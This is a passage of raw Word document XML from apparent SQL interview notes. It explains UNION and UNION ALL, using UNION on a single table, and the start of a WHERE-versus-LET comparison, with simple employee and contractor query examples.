          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="714"/>
    </w:p>
    <w:p w14:paraId="17589949" w14:textId="4EE66B9A" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00393B05" w:rsidP="00CA2653">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00AF73EB" w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">n SQL, </w:t>
      </w:r>
      <w:r w:rsidR="00AF73EB" w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidR="00AF73EB" w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an operation that combines the results of two or more SELECT queries into a single result set. It removes duplicate rows by default. Essentially, it allows you to merge the results of multiple queries while maintaining uniqueness across all the rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD3A45" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Key Points about UNION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B13E1C"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olumn Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA8983A" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Each SELECT statement in the UNION must have the same number of columns and corresponding columns must have compatible data types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E4E408"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uplicate Removal</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450CBD3B" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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By default, UNION removes duplicate rows from the final result set. If you want to include duplicates, you can use UNION ALL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C44E5D"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Order of Rows</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FF0CAB" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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The result set will not necessarily be ordered unless you use an ORDER BY clause after the last SELECT statement in the union.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895CF84" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646DB2A"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ELECT column1, column2, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752966C"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FROM table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661A7F7"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WHERE condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B759CCD"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UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D37CA"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ELECT column1, column2, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68223FFC"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FROM table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD8D47"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WHERE condition;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E219165" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D396CD"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Let’s say we have two tables, </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>employees</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contractors</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, both with the same structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284CF869"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mployees</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: employee_id, employee_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2A7FE"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ontractors</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: contractor_id, contractor_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31537891"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We want to combine the names of employees and contractors into a single list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A451C7A"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lastRenderedPageBreak/>
        <w:t>SELECT employee_name AS name FROM employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862714C"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UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A16FE9"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ELECT contractor_name AS name FROM contractors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134F2EDD"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This query will return all unique names from both the employees and contractors tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC59971" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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UNION ALL Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C76FE"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If you want to include duplicate names (i.e., when a name appears in both tables), you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DBA2E"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ELECT employee_name AS name FROM employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C2A44"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UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E24FC"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ELECT contractor_name AS name FROM contractors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBD8674" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Key Differences Between UNION and UNION ALL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DBDEBD"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UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> removes duplicate rows from the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCE740"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UNION ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes all rows, even duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940865A" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6EE729"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ombining results from multiple tables</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you want to get similar data from different sources and combine them, UNION can help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A70023" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data consolidation</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to consolidate data with similar structure into a single result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5DB7B9" w14:textId="7D28D220" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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7D68E95">
          <v:rect id="_x0000_i2993" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF9E4A" w14:textId="296532D6" w:rsidR="001D73F8" w:rsidRPr="00CE4B95" w:rsidRDefault="006C32BA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="715" w:name="_Toc196308195"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we perform union operations on one table</w:t>
      </w:r>
      <w:r w:rsidR="001D73F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="715"/>
    </w:p>
    <w:p w14:paraId="172C78B9" w14:textId="532A8F58" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00B327A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Yes, you can perform a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation on a single table. In this case, the query will combine the results of multiple SELECT statements that query from the same table, potentially with different conditions, and return a combined result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202012B2" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Example of UNION on a Single Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A0711"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Let’s say you have a table named employees with the following structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296DC6D5"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mployees</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: employee_id, employee_name, department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371A0EF"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You can perform a UNION to combine different SELECT queries on the same table, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6937DC92"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ELECT employee_name FROM employees WHERE department_id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F15AEAC"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UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDAC9F6"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ELECT employee_name FROM employees WHERE department_id = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82B529"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This query will return a combined list of employee names who belong to </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>department 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>department 2</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, without duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CDB15" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Why would you use UNION on one table?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D91C4"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Multiple Filter Conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to retrieve data from a single table but apply different filter conditions (like different departments in the example above).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026DDD94"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ombining Different Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You might want to combine different columns or computed data based on different conditions (e.g., fetching active employees in one query and inactive ones in another).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA3448"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Including Various Views of the Same Data</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When querying a table from different perspectives (e.g., managers in one query, regular employees in another) and then combining the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D148CDF" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Example - Selecting Different Columns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D01E7"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ELECT employee_name FROM employees WHERE department_id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EEF248"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UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D17532"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ELECT employee_id FROM employees WHERE department_id = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89CC1E"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n this case, the columns in both SELECT queries need to be of compatible types (e.g., both employee_name and employee_id should be of the same type, like VARCHAR or INT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10686348" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB58678"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Same Number of Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The SELECT statements used in a UNION operation must return the same number of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F45DBE"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olumn Type Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The data types of corresponding columns in each SELECT query must be compatible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD2C0C"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uplicates Removed by Default</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: UNION removes duplicate rows from the final result. If you want to keep duplicates, use UNION ALL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324FA306"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o, while performing UNION on a single table, it's about combining results from different queries that operate on that table, usually with different conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B697E5" w14:textId="1A22F356" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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6E49487">
          <v:rect id="_x0000_i2994" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98587A" w14:textId="1A743BC3" w:rsidR="001D73F8" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6323">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="716" w:name="_Toc196308196"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007F49A7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between where and let</w:t>
      </w:r>
      <w:r w:rsidR="001D73F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="716"/>
    </w:p>
    <w:p w14:paraId="55A4DD7F" w14:textId="574CC4BB" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00883747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The difference between WHERE and LET is context-dependent, as they are used in different situations. Here’s an explanation for each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D23312" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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lastRenderedPageBreak/>
        <w:t>1. WHERE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFDFC87"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ontext</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Primarily used in SQL (Structured Query Language) and in some programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCD895B"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is a conditional clause used to filter records based on specific criteria in SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B3863"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In SQL, WHERE is used to filter rows that meet the specified condition(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234ED6A7" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Example in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228D9059"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ELECT * FROM employees WHERE department_id = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE76B58"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This query will select all records from the employees table where the department_id is 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680DCD9B" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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Other uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495ADD0"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In </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LINQ</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
